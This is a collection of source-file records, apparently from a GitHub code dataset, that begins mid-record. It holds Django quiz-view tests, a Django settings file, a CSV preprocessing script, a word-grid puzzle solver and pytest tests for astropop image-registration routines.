test_emailform_with_existing_user_email(self):\n response = self.client.post(\n reverse('quiz_capture_email'), {'email': self.user.email}, follow=True\n )\n self.assertFormError(\n response, 'form', 'email', EmailForm.EXISTING_EMAIL_ADDRESS\n )\n\n\nclass TestQuizDetailDifficulty(TestCase):\n fixtures = ['testuser.yaml']\n # A single test-user, TestyMcTesterson, with password 'password'\n\n def setUp(self):\n super(TestQuizDetailDifficulty, self).setUp()\n self.user = User.objects.get(username='TestyMcTesterson')\n self.expected = '
Step 1 of %s
'\n self.assertTrue(\n self.client.login(username=self.user.username, password='password')\n )\n\n def tearDown(self):\n super(TestQuizDetailDifficulty, self).tearDown()\n Quiz.objects.all().delete()\n Question.objects.all().delete()\n\n def test_easy_quiz_has_1_step(self):\n quiz = Quiz.objects.create(name='easy', slug='easy', status=Quiz.LIVE)\n q1 = Question.objects.create(question='foo')\n q2 = Question.objects.create(question='bar')\n quiz.questions.add(q1)\n quiz.questions.add(q2)\n response = self.client.get(\n reverse('quiz_detail', args=[quiz.slug]), follow=True\n )\n self.assertContains(response, self.expected % 1)\n\n def test_medium_quiz_has_2_steps(self):\n quiz = Quiz.objects.create(name='easy', slug='easy', status=Quiz.LIVE)\n q1 = Question.objects.create(question='foo', difficulty=Question.EASY)\n q2 = Question.objects.create(question='bar', difficulty=Question.MEDIUM)\n quiz.questions.add(q1)\n quiz.questions.add(q2)\n response = self.client.get(\n reverse('quiz_detail', args=[quiz.slug]), follow=True\n )\n self.assertContains(response, self.expected % 2)\n\n def test_hard_quiz_has_3_steps(self):\n quiz = Quiz.objects.create(name='easy', slug='easy', status=Quiz.LIVE)\n q1 = Question.objects.create(question='foo', difficulty=Question.EASY)\n q2 = Question.objects.create(question='bar', difficulty=Question.MEDIUM)\n q3 = Question.objects.create(question='bar', difficulty=Question.HARD)\n quiz.questions.add(q1)\n quiz.questions.add(q2)\n quiz.questions.add(q3)\n response = self.client.get(\n reverse('quiz_detail', args=[quiz.slug]), follow=True\n )\n self.assertContains(response, self.expected % 3)\n\n\nclass TestRedirectToQuizList(TestCase):\n fixtures = ['python-zen.yaml', 'testuser.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n # A single test-user, TestyMcTesterson, with password 'password'\n\n def setUp(self):\n super(TestRedirectToQuizList, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n self.user = User.objects.get(username='TestyMcTesterson')\n\n def test_redirect_works_unauthenticated(self):\n response = self.client.get(\n reverse(redirect_to_quiz_list, args=(self.quiz.slug,)), follow=True\n )\n assert_equal(200, response.status_code)\n self.assertRedirects(response, reverse('quiz_list'), status_code=301)\n\n def test_redirect_works_authenticated(self):\n self.client.login(username=self.user.username, password='password')\n response = self.client.get(\n reverse(redirect_to_quiz_list, args=(self.quiz.slug,)), follow=True\n )\n assert_equal(200, response.status_code)\n self.assertRedirects(response, reverse('quiz_list'), status_code=301)\n","repo_name":"chrischambers/django-quizzes","sub_path":"quiz/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"26586138537","text":"import os\nSITE_ROOT = os.path.dirname(os.path.abspath(__file__))\nSITE_BASEURL = '/'\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = False\nUSE_L10N = True\n\nMEDIA_URL = SITE_BASEURL + ''\nADMIN_MEDIA_PREFIX = '/admin/media/'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 
'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n os.path.join(SITE_ROOT, 'templates')\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n\n 'image',\n\n\t# south, for migrations\n\t'south',\n)\n\nIMAGE_ID_OFFSET = 0\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = '/login'\n\n# import local settings (if it exists) and override these things.\ntry:\n from local_settings import *\nexcept:\n pass\n\n","repo_name":"mjlee156/imghost","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"34015289016","text":"import numpy as np\n#import pandas as pd\nimport csv, pickle #string, re\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\ndef save_obj(obj, name ):\n with open('obj/'+ name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\nfile_in = open('gps_test.csv', 'r',encoding = \"ISO-8859-1\")\ndata = csv.reader(file_in)\ntxt = ''\nstatuses = []\nlabels = []\nlengths = []\n\nfor row in data:\n labels.append([row[0:5]])\n statuses.append(row[6])\n lengths.append(len(row[6]))\n txt += row[6]\n\nmaxlen = 1024\nchars = sorted(set(txt))\nprint(chars)\n\n","repo_name":"MehradSm/Char-Level-Models-to-Predict-Gender","sub_path":"Preprocessing/csv_to_XY.py","file_name":"csv_to_XY.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43009521908","text":"'''\n\tIdentifies the possible word combinations\n\n\n\t\n'''\n\nimport numpy as np\nimport csv\nimport time\n\n# Node class in the form of linked lists\n# class Node: \n \n# # Function to initialize the node object \n# def __init__(self, data): \n# self.data = data # Assign data \n# self.next = None # Initialize \n# # next as null \n\nclass TeluguPoti():\n\n\tdef __init__(self):\n\n\t\tself.dictionary = set()\n\t\twith open('english_filtered.csv') as file:\n\t\t\tfile = csv.reader(file, delimiter=',')\n\t\t\tline_count = 0\n\t\t\tfor row in file:\n\t\t\t\tfor i in range(len(row)):\n\t\t\t\t\tself.dictionary.add(row[i])\n\t\t\t\tline_count += 1\n\t\t\tprint('Processed '+str(line_count)+' lines.')\n\t\t# self.grid = [['స','క','వి','త'],\n\t\t# \t\t['చా','మ','ర','ము'],\n\t\t# \t\t['కు','ల','కం','న'],\n\t\t# \t\t['కి','ము','ళ','గ']]\n\t\t# self.grid = [['కు','కూ','ల','ము'],\n\t\t# \t\t\t['కు','ఠా','ర','ము'],\n\t\t# \t\t\t['కు','డ','ప','ము'],\n\t\t# \t\t\t['కు','పి','తు','డు']]\n\t\tself.grid = [\n\t\t\t['a','t','m','o'],\n\t\t\t['p','i','n','k'],\n\t\t\t['h','g','e','c'],\n\t\t\t['a','l','b','u']\n\t\t]\n\t\t# self.g = self.grid[0]+self.grid[1]+self.grid[2]+self.grid[3]\n\t\tself.buf = []\n\t\tself.l = len(self.grid[0])\n\n\n\tdef save(self, k):\n\t\t# with open('output.csv','w',newline='') as file:\n\t\t\t# writer = csv.writer(file)\n\t\t\t# writer.writerow(self.dictionary[8])\n\t\tf = open(\"output.txt\", \"w\")\n\t\tfor i in k:\n\t\t\tf.write(i)\n\t\t\tf.write('\\n')\n\t\tf.close()\n\n\n\tdef filterFromDictionary(self):\n\t\twordList = []\n\t\t# get words starting from each cell\n\t\tfor i in range(16):\n\t\t\t# get words 
whose length is atleast 3 and atmost 6\n\t\t\tfor n in range(3,6):\n\t\t\t\t# get the words starting from ith cell and length of n\n\t\t\t\twordList += self.getWords(i,n)\n\t\t\t\tself.buf = []\n\t\twordList = list(dict.fromkeys(wordList))\n\t\t# print(len(wordList), wordList)\n\t\tfinal = []\n\t\tfor word in wordList:\n\t\t\tif word in self.dictionary:\n\t\t\t\tfinal.append(word)\n\n\t\tprint('found {} words'.format(len(final)))\n\t\treturn final\n\t\t\n\n\tdef getNeighbours(self, index):\n\t\t# \tint [][][] neighbours = {\n\t\t#             {\n\t\t#                 {1,3,5,8},//0\n\t\t#                 {3,4,6,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {0,2,3,4,6,8,9},//1\n\t\t#                 {9,3,8,4,6,7,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {1,4,7,9},//2\n\t\t#                 {9,8,6,7}\n\t\t#             },\n\t\t#             {\n\t\t#                 {0,1,4,5,6,8,10,11},//3\n\t\t#                 {10,2,3,8,4,6,7,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {1,2,3,6,7,9,11,12},//4\n\t\t#                 {10,2,9,8,4,6,7,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {0,3,6,8,10,13},//5\n\t\t#                 {0,2,3,4,6,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {1,3,4,5,7,8,9,11,13,14},//6\n\t\t#                 {0,10,2,9,3,8,4,6,7,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {2,4,6,9,12,14},//7\n\t\t#                 {0,10,9,8,6,7}\n\t\t#             },\n\t\t#             {\n\t\t#                 {0,1,3,5,6,9,10,11,13,15,16},//8\n\t\t#                 {11,1,0,10,2,3,8,4,6,7,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {1,2,4,6,7,8,11,12,14,16,17},//9\n\t\t#                 {11,1,0,10,2,9,8,4,6,7,5}\n\t\t#             },\n\t\t#             {\n\t\t#                 {3,5,8,11,13,15},//10\n\t\t#                 {1,0,2,3,4,6}\n\t\t#             },\n\t\t#             {\n\t\t#                 {3,4,6,8,9,10,12,13,14,16},//11\n\t\t#                 {11,1,0,10,2,9,3,8,4,6}\n\t\t#             },\n\t\t#             {\n\t\t#                 {4,7,9,11,14,17},//12\n\t\t#                 {11,0,10,9,8,6}\n\t\t#             },\n\t\t#             {\n\t\t#                 {5,6,8,10,11,14,15,16},//13\n\t\t#                 {11,1,0,10,2,3,8,4}\n\t\t#             },\n\t\t#             {\n\t\t#                 {6,7,9,11,12,13,16,17},//14\n\t\t#                 {11,1,0,10,2,9,8,4}\n\t\t#             },\n\t\t#             {\n\t\t#                 {8,10,13,16},//15\n\t\t#                 {1,0,2,3}\n\t\t#             },\n\t\t#             {\n\t\t#                 {8,9,11,13,14,15,17},//16\n\t\t#                 {11,1,0,10,2,9,3}\n\t\t#             },\n\t\t#             {\n\t\t#                 {9,12,14,16},//17\n\t\t#                 {11,0,10,9}\n\t\t#             }\n\t\t#         };\n\t\tr = []\n\t\ti = int(index/self.l)\n\t\tj = index%self.l\n\t\tr += [ [i-1,j-1],[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j]]\n\t\tr2 = []\n\t\tfor k in r:\n\t\t\tif k[0]>=0 and k[0]<self.l and k[1]>=0 and k[1]<self.l:\n\t\t\t\tr2.append(k)\n\t\treturn r2\n\n\tdef getWords(self, index, num):\n\t\twords = []\n\t\tif num>2:\n\t\t\tself.buf.append(index)\n\t\t\tfor i in self.getNeighbours(index):\n\t\t\t\tif self.l*i[0]+i[1] not in self.buf:\n\t\t\t\t\ta = self.grid[int(index/self.l)][index%self.l]\n\t\t\t\t\tfor j in self.getWords(self.l*i[0]+i[1], num - 1):\n\t\t\t\t\t\ta+= j\n\t\t\t\t\t\twords.append(a)\n\t\t\t\t\t\t# print(self.buf)\n\t\t\t\t\t\ta = a[:-(len(j))]\n\t\t\tself.buf.pop()\n\t\telif num==2:\n\t\t\tfor i in self.getNeighbours(index):\n\t\t\t\tif self.l*i[0]+i[1] not in self.buf:\n\t\t\t\t\ta = self.grid[int(index/self.l)][index%self.l]\n\t\t\t\t\ta += self.grid[i[0]][i[1]]\n\t\t\t\t\twords.append(a)\n\n\t\treturn words\n\n\n\n\n\n\t\nif __name__=='__main__':\n\tt = time.time()\n\tT = TeluguPoti()\n\tT.save(T.filterFromDictionary())\n\tprint('time taken: {} seconds'.format(time.time()-t))\n\t# T.save(T.getWords(0,2))\n","repo_name":"SrikarSiddarth/Padakeli","sub_path":"wordFilter2.py","file_name":"wordFilter2.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"}
+{"seq_id":"39436117892","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\r\n# flake8: noqa: F403, F405\r\n\r\nimport pytest\r\nimport numpy as np\r\nfrom astropop.image.register import AsterismRegister, \\\r\n                                    CrossCorrelationRegister, \\\r\n                                    register_framedata_list, \\\r\n                                    compute_shift_list\r\nfrom astropop.framedata import FrameData, PixelMaskFlags\r\nfrom astropop.testing 
import *\r\n\r\nfrom .test_detection import gen_position_flux, gen_image\r\n\r\n\r\ndef gen_positions_transformed(x, y, flux, dx, dy, limits,\r\n rotation=None, rotation_center=None):\r\n \"\"\"Generate translated positions.\"\"\"\r\n x, y = x+dx, y+dy\r\n\r\n if rotation is not None:\r\n rotation_center = rotation_center or np.array(limits)/2\r\n cx, cy = rotation_center\r\n theta = np.deg2rad(rotation)\r\n nx = cx + (x-cx)*np.cos(theta) - (y-cy)*np.sin(theta)\r\n ny = cy + (x-cx)*np.sin(theta) + (y-cy)*np.cos(theta)\r\n x, y = nx, ny\r\n\r\n # ensure all positions are inside the image\r\n mask = x >= 0\r\n mask &= x <= limits[0]\r\n mask &= y >= 0\r\n mask &= y <= limits[1]\r\n where = np.where(mask)\r\n\r\n return x[where], y[where], flux[where]\r\n\r\n\r\nclass Test_AsterismRegister:\r\n @pytest.mark.parametrize('shift', [(25, 32), (-12, 5), (23.42, 12.43)])\r\n def test_compute_transform_translation(self, shift):\r\n size = (1024, 1024)\r\n sky = 800\r\n n = 100\r\n rdnoise = 5\r\n x, y, f = gen_position_flux(np.array(size)+80, n, 1e4, 4e6)\r\n x -= 40\r\n y -= 40\r\n sx, sy = shift\r\n\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, 0, 0, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n\r\n x2, y2, flux2 = gen_positions_transformed(x, y, f, sx, sy, size)\r\n im2 = gen_image(size, x2, y2, flux2,\r\n sky, rdnoise, sigma=2)\r\n\r\n ar = AsterismRegister()\r\n tform = ar._compute_transform(im1, im2)\r\n\r\n assert_almost_equal(tform.translation, shift, decimal=1)\r\n assert_almost_equal(tform.rotation, 0, decimal=3)\r\n assert_almost_equal(tform.scale, 1, decimal=4)\r\n\r\n def test_compute_transform_rotation(self):\r\n size = (1024, 1024)\r\n sky = 800\r\n n = 300\r\n rdnoise = 5\r\n x, y, f = gen_position_flux(2*np.array(size), n, 1e4, 4e6)\r\n x -= 500\r\n y -= 500\r\n\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, 0, 0, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n\r\n x2, y2, flux2 = gen_positions_transformed(x, y, f, 0, 0, size,\r\n rotation=35.2)\r\n im2 = gen_image(size, x2, y2, flux2,\r\n sky, rdnoise, sigma=2)\r\n\r\n ar = AsterismRegister()\r\n tform = ar._compute_transform(im1, im2)\r\n\r\n assert_almost_equal(tform.rotation, np.deg2rad(35.2), decimal=3)\r\n # the translation is needed due to the form skimage handles rotation\r\n assert_almost_equal(tform.translation, [388.7, -201.5], decimal=0)\r\n assert_almost_equal(tform.scale, 1, decimal=4)\r\n\r\n\r\nclass Test_CrossCorrelationRegister:\r\n @pytest.mark.parametrize('shift', [(25, 32), (-12, 5), (23.42, 12.43)])\r\n def test_compute_transform(self, shift):\r\n size = (1024, 1024)\r\n sky = 800\r\n n = 60\r\n rdnoise = 5\r\n x, y, f = gen_position_flux(np.array(size)+80, n, 1e4, 4e6)\r\n x -= 40\r\n y -= 40\r\n sx, sy = shift\r\n\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, 0, 0, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n\r\n x2, y2, flux2 = gen_positions_transformed(x, y, f, sx, sy, size)\r\n im2 = gen_image(size, x2, y2, flux2,\r\n sky, rdnoise, sigma=2)\r\n\r\n ccr = CrossCorrelationRegister(upsample_factor=10)\r\n tform = ccr._compute_transform(im1, im2)\r\n\r\n assert_almost_equal(tform.translation, shift, decimal=1)\r\n assert_almost_equal(tform.rotation, 0, decimal=3)\r\n assert_almost_equal(tform.scale, 1, decimal=4)\r\n\r\n\r\nclass Test_Registration:\r\n @pytest.mark.parametrize('cval,fill', [(0, 0),\r\n ('median', 1.0),\r\n ('mean', 1.51)])\r\n def test_register_image(self, cval, fill):\r\n 
im1 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 2, 6, 8, 6, 2, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n im2 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 2, 6, 8, 6, 2, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n expect = np.array(im1, dtype='f8')\r\n expect[0, :] = fill\r\n expect[:, -2:] = fill\r\n\r\n mask = np.zeros_like(im2, dtype=bool)\r\n mask[0, :] = 1\r\n mask[:, -2:] = 1\r\n\r\n ar = CrossCorrelationRegister()\r\n im_reg, mask_reg, tform = ar.register_image(np.array(im1), np.array(im2),\r\n cval=cval)\r\n\r\n assert_equal(im_reg, expect)\r\n assert_equal(mask_reg, mask)\r\n assert_equal(tform.translation, [2, -1])\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n @pytest.mark.parametrize('cval,fill', [(0, 0),\r\n ('median', 1.0),\r\n ('mean', 1.51)])\r\n def test_register_framedata(self, inplace, cval, fill):\r\n im1 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 2, 6, 8, 6, 2, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n im2 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 2, 6, 8, 6, 2, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n expect = np.array(im1, dtype='f8')\r\n expect[0, :] = fill\r\n expect[:, -2:] = fill\r\n\r\n mask = np.zeros_like(im2, dtype=bool)\r\n mask[0, :] = 1\r\n mask[:, -2:] = 1\r\n\r\n flags = np.zeros_like(im2, dtype='u1')\r\n flags[5, 5] = 5\r\n exp_flags = np.zeros_like(im2, dtype='u1')\r\n exp_flags[3, 6] = 5\r\n exp_flags[0, :] = (PixelMaskFlags.REMOVED |\r\n PixelMaskFlags.OUT_OF_BOUNDS).value\r\n exp_flags[:, -2:] = (PixelMaskFlags.REMOVED |\r\n PixelMaskFlags.OUT_OF_BOUNDS).value\r\n\r\n expect_unct = np.ones_like(im2, dtype='f8')\r\n expect_unct[0, :] = np.nan\r\n expect_unct[:, -2:] = np.nan\r\n\r\n frame1 = FrameData(im1, dtype='f8', flags=flags)\r\n frame1.meta['moving'] = False\r\n frame1.uncertainty = np.ones_like(im1)\r\n frame2 = FrameData(im2, dtype='f8', flags=flags)\r\n frame2.meta['moving'] = True\r\n frame2.uncertainty = np.ones_like(im2)\r\n\r\n ar = CrossCorrelationRegister()\r\n frame_reg = ar.register_framedata(frame1, frame2,\r\n cval=cval, inplace=inplace)\r\n\r\n assert_equal(frame_reg.data, expect)\r\n assert_equal(frame_reg.mask, mask)\r\n assert_equal(frame_reg.uncertainty, expect_unct)\r\n assert_equal(frame_reg.meta['astropop registration'],\r\n 'cross-correlation')\r\n assert_equal(frame_reg.meta['astropop registration_shift_x'], 2)\r\n assert_equal(frame_reg.meta['astropop registration_shift_y'], -1)\r\n assert_equal(frame_reg.meta['astropop registration_rot'], 0)\r\n 
assert_equal(frame_reg.meta['moving'], True)\r\n if inplace:\r\n assert_is(frame_reg, frame2)\r\n else:\r\n assert_is_not(frame_reg, frame2)\r\n\r\n def test_register_image_equal(self):\r\n im = gen_image((50, 50), [25], [25], [10000], 10, 0, sigma=3)\r\n ar = CrossCorrelationRegister()\r\n im_reg, mask_reg, tform = ar.register_image(im, im)\r\n assert_is(im_reg, im)\r\n assert_equal(im_reg, im)\r\n assert_equal(mask_reg, np.zeros_like(im))\r\n assert_equal(tform.translation, [0, 0])\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n def test_register_frame_equal(self, inplace):\r\n im = gen_image((50, 50), [25], [25], [10000], 10, 0, sigma=3)\r\n im = FrameData(im)\r\n flags = np.zeros((50, 50), dtype=np.uint8)\r\n flags[25, 25] = 5\r\n im.flags = flags\r\n ar = CrossCorrelationRegister()\r\n im_reg = ar.register_framedata(im, im, inplace=inplace)\r\n if inplace:\r\n assert_is(im_reg, im)\r\n else:\r\n assert_is_not(im_reg, im)\r\n assert_equal(im_reg.data, im.data)\r\n assert_equal(im_reg.mask, np.zeros_like(im))\r\n assert_equal(im_reg.flags, flags)\r\n assert_equal(im_reg.meta['astropop registration_shift_x'], 0)\r\n assert_equal(im_reg.meta['astropop registration_shift_y'], 0)\r\n\r\n\r\nclass Test_Register_FrameData_List:\r\n _shifts = [(0, 0), (-1, 22.4), (15.5, 3.2), (2.2, -1.75), (-5.4, 0.5)]\r\n\r\n def gen_frame_list(self, size):\r\n sky = 800\r\n rdnoise = 10\r\n n = 100\r\n x, y, f = gen_position_flux(np.array(size)+80, n, 1e4, 4e6)\r\n x -= 40\r\n y -= 40\r\n\r\n frame_list = []\r\n for shift in self._shifts:\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, *shift, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n frame = FrameData(im1, meta={'test expect_shift_x': shift[0],\r\n 'test expect_shift_y': shift[1]})\r\n frame_list.append(frame)\r\n\r\n return frame_list\r\n\r\n def test_error_unkown_algorithm(self):\r\n with pytest.raises(ValueError, match='Algorithm noexisting unknown.'):\r\n register_framedata_list([FrameData([[1]]) for i in range(10)],\r\n algorithm='noexisting')\r\n with pytest.raises(ValueError, match='Algorithm noexisting unknown.'):\r\n compute_shift_list([FrameData([[1]]) for i in range(10)],\r\n algorithm='noexisting')\r\n\r\n def test_error_non_framedata(self):\r\n with pytest.raises(TypeError, match='Only a list of FrameData'):\r\n register_framedata_list([np.zeros((10, 10)) for i in range(10)])\r\n with pytest.raises(TypeError, match='Only a list of FrameData'):\r\n compute_shift_list([np.zeros((10, 10)) for i in range(10)])\r\n\r\n def test_error_non_iterable_list(self):\r\n with pytest.raises(TypeError):\r\n register_framedata_list(10)\r\n with pytest.raises(TypeError):\r\n compute_shift_list(10)\r\n\r\n def test_error_incompatible_shapes(self):\r\n frame_list = [FrameData(np.zeros((i+1, i+1))) for i in range(10)]\r\n with pytest.raises(ValueError, match='incompatible shapes'):\r\n register_framedata_list(frame_list)\r\n with pytest.raises(ValueError, match='incompatible shapes'):\r\n compute_shift_list(frame_list)\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n def test_register_framedata_crosscorr(self, inplace):\r\n frame_list = self.gen_frame_list((1024, 1024))\r\n reg_list = register_framedata_list(frame_list,\r\n algorithm='cross-correlation',\r\n inplace=inplace,\r\n upsample_factor=10, space='real')\r\n assert_equal(len(frame_list), len(reg_list))\r\n for org, reg in zip(frame_list, reg_list):\r\n if inplace:\r\n assert_is(org, reg)\r\n else:\r\n assert_is_not(org, reg)\r\n for i 
in ['x', 'y']:\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}']\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n\r\n if not inplace:\r\n shift_list = compute_shift_list(frame_list,\r\n algorithm='cross-correlation',\r\n upsample_factor=10, space='real')\r\n assert_equal(len(frame_list), len(shift_list))\r\n assert_almost_equal(shift_list, self._shifts, decimal=0)\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n def test_register_framedata_asterism(self, inplace):\r\n frame_list = self.gen_frame_list((1024, 1024))\r\n reg_list = register_framedata_list(frame_list,\r\n algorithm='asterism-matching',\r\n inplace=inplace,\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(reg_list))\r\n for org, reg in zip(frame_list, reg_list):\r\n if inplace:\r\n assert_is(org, reg)\r\n else:\r\n assert_is_not(org, reg)\r\n for i in ['x', 'y']:\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}']\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n\r\n if not inplace:\r\n shift_list = compute_shift_list(frame_list,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(shift_list))\r\n assert_almost_equal(shift_list, self._shifts, decimal=0)\r\n\r\n def test_register_framedata_list_ref_image(self):\r\n frame_list = self.gen_frame_list((1024, 1024))\r\n reg_list = register_framedata_list(frame_list,\r\n algorithm='asterism-matching',\r\n ref_image=4,\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(reg_list))\r\n ref_shift = np.array(self._shifts[4])\r\n\r\n for org, reg in zip(frame_list, reg_list):\r\n for i, ref in zip(['x', 'y'], ref_shift):\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}'] - ref\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n\r\n shift_list = compute_shift_list(frame_list,\r\n ref_image=4,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(shift_list))\r\n assert_almost_equal(shift_list, self._shifts - ref_shift, decimal=0)\r\n\r\n def test_register_framedata_list_clip(self):\r\n frame_list = self.gen_frame_list((512, 1024))\r\n reg_list = register_framedata_list(frame_list, clip_output=True,\r\n inplace=True,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5)\r\n\r\n assert_equal(len(frame_list), len(reg_list))\r\n for org, reg in zip(frame_list, reg_list):\r\n assert_is(org, reg)\r\n for i in ['x', 'y']:\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}']\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n assert_equal(reg.meta['astropop trimmed_section'], '6:-16,2:-23')\r\n # x: 6:-16, y: 2:-23\r\n assert_equal(reg.shape, (1024-23-2, 512-6-16))\r\n # no masked pixel should remain\r\n assert_false(np.any(reg.mask))\r\n\r\n def test_register_framedata_list_skip_failure_default(self):\r\n # defult behavior is raise error\r\n frame_list = self.gen_frame_list((512, 1024))\r\n frame_list[2].data = np.ones((1024, 512))\r\n\r\n with pytest.raises(ValueError):\r\n register_framedata_list(frame_list, algorithm='asterism-matching')\r\n\r\n with pytest.raises(ValueError):\r\n 
